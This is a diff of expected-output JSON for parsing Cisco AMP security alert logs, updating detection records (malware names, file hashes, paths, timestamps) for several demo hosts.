@@ "host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 301500, + "log.offset": 50051, "related.hash": [ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "b99e0a8c56f963246b6464b9fffbf7a2", @@ -5599,64 +2011,56 @@ ] }, { - "@timestamp": "2021-01-15T10:10:11.000Z", + "@timestamp": "2021-01-15T10:18:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "b2:4b:d5:c2:a6:9f" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "ZBot:FakeAlert-tpd", - "cisco.amp.detection_id": "5832268410590855181", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669147354595367", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Unknown", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "b2:4b:d5:c2:a6:9f" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 13000000, + "cisco.amp.timestamp_nanoseconds": 360000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5832268414885822000, + "event.id": 6533669147354595000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e74f1b3fffc4ae61e077bbdec3230e95", - "file.hash.sha1": "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5", - "file.hash.sha256": "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", - "file.name": "2_3756858138.exe", - "file.path": "\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3756858138.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Zbot", - "host.name": "Demo_Zbot", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 302825, - "process.hash.md5": "9a2e18cb348feb772d02fb8f8728ab82", - "process.hash.sha1": "5df10f3387f7ff512e420240f81bde68a2b4c7aa", - "process.hash.sha256": "0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f", - "process.name": "a.exe", - "process.pid": 3020, + "log.offset": 51377, "related.hash": [ - "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", - "e74f1b3fffc4ae61e077bbdec3230e95", - "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Zbot" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", @@ -5672,64 +2076,56 @@ ] }, { - "@timestamp": "2021-01-15T10:10:10.000Z", + "@timestamp": "2021-01-15T10:18:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "b2:4b:d5:c2:a6:9f" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "ZBot:FakeAlert-tpd", - "cisco.amp.detection_id": "5832268410590855180", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533669143059628070", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Unknown", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "b2:4b:d5:c2:a6:9f" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 810000000, + "cisco.amp.timestamp_nanoseconds": 968000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5832268410590855000, + "event.id": 6533669143059628000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e74f1b3fffc4ae61e077bbdec3230e95", - "file.hash.sha1": "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5", - "file.hash.sha256": "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", - "file.name": "2_3756858138.exe", - "file.path": "\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3756858138.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Zbot", - "host.name": "Demo_Zbot", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 304431, - "process.hash.md5": "9a2e18cb348feb772d02fb8f8728ab82", - "process.hash.sha1": "5df10f3387f7ff512e420240f81bde68a2b4c7aa", - "process.hash.sha256": "0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f", - "process.name": "a.exe", - "process.pid": 3020, + "log.offset": 52696, "related.hash": [ - "8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a", - "e74f1b3fffc4ae61e077bbdec3230e95", - "e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Zbot" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", @@ -5745,7 +2141,7 @@ ] }, { - "@timestamp": "2021-01-15T10:09:53.000Z", + "@timestamp": "2021-01-15T10:18:25.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -5757,7 +2153,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257087266357305", + "cisco.amp.detection_id": "6176259286289612895", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -5766,14 +2162,14 @@ "cisco.amp.related.mac": [ "23:d5:92:eb:f8:9b" ], - "cisco.amp.timestamp_nanoseconds": 942000000, + "cisco.amp.timestamp_nanoseconds": 669000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257087266357000, + "event.id": 6176259286289613000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -5786,7 +2182,7 @@ "host.hostname": "Demo_Dyre", "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 307596, + "log.offset": 54015, "related.hash": [ "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", "e9d8c15e7d18678dd41771f72ed6693c", @@ -5806,129 +2202,60 @@ ] }, { - "@timestamp": "2021-01-15T10:09:51.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666798007484426", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 469000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533666798007484000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 308915, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:09:50.000Z", + "@timestamp": "2021-01-15T10:18:13.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "23:d5:92:eb:f8:9b" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666793712517128", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259234750005342", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" + "23:d5:92:eb:f8:9b" ], - "cisco.amp.timestamp_nanoseconds": 948000000, + "cisco.amp.timestamp_nanoseconds": 657000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533666793712517000, + "event.id": 6176259234750005000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 311551, + "log.offset": 55334, "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Dyre" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -5936,72 +2263,60 @@ ] }, { - "@timestamp": "2021-01-15T10:09:48.000Z", + "@timestamp": "2021-01-15T10:18:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "23:d5:92:eb:f8:9b" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666785122582535", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176259183210397789", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" + "23:d5:92:eb:f8:9b" ], - "cisco.amp.timestamp_nanoseconds": 372000000, + "cisco.amp.timestamp_nanoseconds": 645000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533666785122583000, + "event.id": 6176259183210398000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 312869, - "process.hash.md5": "51138beea3e2c21ec44d0932c71762a8", - "process.hash.sha1": "8939cf35447b22dd2c6e6f443446acc1bf986d58", - "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", - "process.name": "rundll32.exe", - "process.pid": 596, + "log.offset": 56653, "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" ], "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Dyre" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], - "related.user": [ - "user@testdomain.com" - ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -6009,60 +2324,72 @@ ] }, { - "@timestamp": "2021-01-15T10:09:42.000Z", + "@timestamp": "2021-01-15T10:17:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257040021717048", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6180335966167760897", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "e1:e5:94:ea:a5:44" ], - "cisco.amp.timestamp_nanoseconds": 304000000, + "cisco.amp.timestamp_nanoseconds": 875000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257040021717000, + "event.id": 6180335966167761000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b2e15a06b0cca8a926c94f8a8eae3d88", + "file.hash.sha1": "f9b02ad8d25157eebdb284631ff646316dc606d5", + "file.hash.sha256": "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", + "file.name": "Fax.exe", + "file.path": "\\\\?\\C:\\Users\\Administrator\\Documents\\Fax\\Fax.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 314451, + "log.offset": 57972, + "process.hash.md5": "8b88ebbb05a0e56b7dcc708498c02b3e", + "process.hash.sha1": "cea0890d4b99bae3f635a16dae71f69d137027b9", + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", + "process.name": "explorer.exe", + "process.pid": 3164, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc", + "b2e15a06b0cca8a926c94f8a8eae3d88", + "f9b02ad8d25157eebdb284631ff646316dc606d5" ], "related.hosts": [ - "Demo_Dyre" + "Demo_Upatre" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -6070,60 +2397,66 @@ ] }, { - "@timestamp": "2021-01-15T10:09:30.000Z", + "@timestamp": "2021-01-15T10:17:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176256988482109495", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668885361590309", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 292000000, + "cisco.amp.timestamp_nanoseconds": 672000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176256988482109000, + "event.id": 6533668885361590000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 315770, + "log.offset": 59570, "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" ], "related.hosts": [ - "Demo_Dyre" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -6131,7 +2464,7 @@ ] }, { - "@timestamp": "2021-01-15T10:09:29.000Z", + "@timestamp": "2021-01-15T10:17:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -6142,8 +2475,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666703518203910", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668885361590308", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -6152,14 +2485,14 @@ "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 782000000, + "cisco.amp.timestamp_nanoseconds": 653000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533666703518204000, + "event.id": 6533668885361590000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -6173,7 +2506,7 @@ "host.name": "Demo_AMP_Threat_Audit", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 317089, + "log.offset": 60896, "related.hash": [ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "b99e0a8c56f963246b6464b9fffbf7a2", @@ -6196,7 +2529,7 @@ ] }, { - "@timestamp": "2021-01-15T10:09:27.000Z", + "@timestamp": "2021-01-15T10:17:57.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -6207,25 +2540,24 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533666694928269316", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533668885361590307", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", - "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 80000000, + "cisco.amp.timestamp_nanoseconds": 260000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6533666694928269000, + "event.id": 6533668885361590000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -6233,20 +2565,13 @@ "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", "fileset.name": "amp", "host.hostname": "Demo_AMP_Threat_Audit", "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 319725, - "process.hash.md5": "51138beea3e2c21ec44d0932c71762a8", - "process.hash.sha1": "8939cf35447b22dd2c6e6f443446acc1bf986d58", - "process.hash.sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124", - "process.name": "rundll32.exe", - "process.pid": 2204, + "log.offset": 62215, "related.hash": [ "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", "b99e0a8c56f963246b6464b9fffbf7a2", @@ -6269,7 +2594,7 @@ ] }, { - "@timestamp": "2021-01-15T10:09:24.000Z", + "@timestamp": "2021-01-15T10:17:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -6281,7 +2606,7 @@ ], "cisco.amp.connector_guid": "test_connector_guid", "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176256962712305718", + "cisco.amp.detection_id": "6176259135965757532", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -6290,14 +2615,14 @@ "cisco.amp.related.mac": [ "23:d5:92:eb:f8:9b" ], - "cisco.amp.timestamp_nanoseconds": 286000000, + "cisco.amp.timestamp_nanoseconds": 8000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176256962712306000, + "event.id": 6176259135965757000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -6310,7 +2635,7 @@ "host.hostname": "Demo_Dyre", "host.name": "Demo_Dyre", "input.type": "log", - "log.offset": 321307, + "log.offset": 63534, "related.hash": [ "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", "e9d8c15e7d18678dd41771f72ed6693c", @@ -6330,72 +2655,55 @@ ] }, { - "@timestamp": "2021-01-15T10:09:07.000Z", + "@timestamp": "2021-01-15T10:17:41.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "c6:4e:72:6f:69:14" + "mac": "90:61:b5:c9:13:79" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "Eldorado:Alureon-tpd", - "cisco.amp.detection_id": "5825617250006073346", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.event_type_id": 1107296272, "cisco.amp.file.disposition": "Malicious", "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "c6:4e:72:6f:69:14" + "90:61:b5:c9:13:79" ], - "cisco.amp.timestamp_nanoseconds": 296000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 291000000, + "event.action": "Executed malware", "event.category": [ - "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 5825617250006073000, + "event.id": 1489955900291000600, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "4a052246c5551e83d2d55f80e72f03eb", - "file.hash.sha1": "bc29f1e8460915596e1dcafd0c92d6309457d149", - "file.hash.sha256": "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - "file.name": "tdss.exe", - "file.path": "\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe", + "event.severity": 3, + "event.start": "2021-01-15T10:17:41.000Z", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", "fileset.name": "amp", - "host.hostname": "Demo_TDSS", - "host.name": "Demo_TDSS", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", "input.type": "log", - "log.offset": 322626, - "process.hash.md5": "12896823fb95bfb3dc9b46bcaedc9923", - "process.hash.sha1": "9d2bf84874abc5b6e9a2744b7865c193c08d362f", - "process.hash.sha256": "1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455", - "process.name": "explorer.exe", - "process.pid": 1892, + "log.offset": 64851, + "process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", "related.hash": [ - "b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5", - 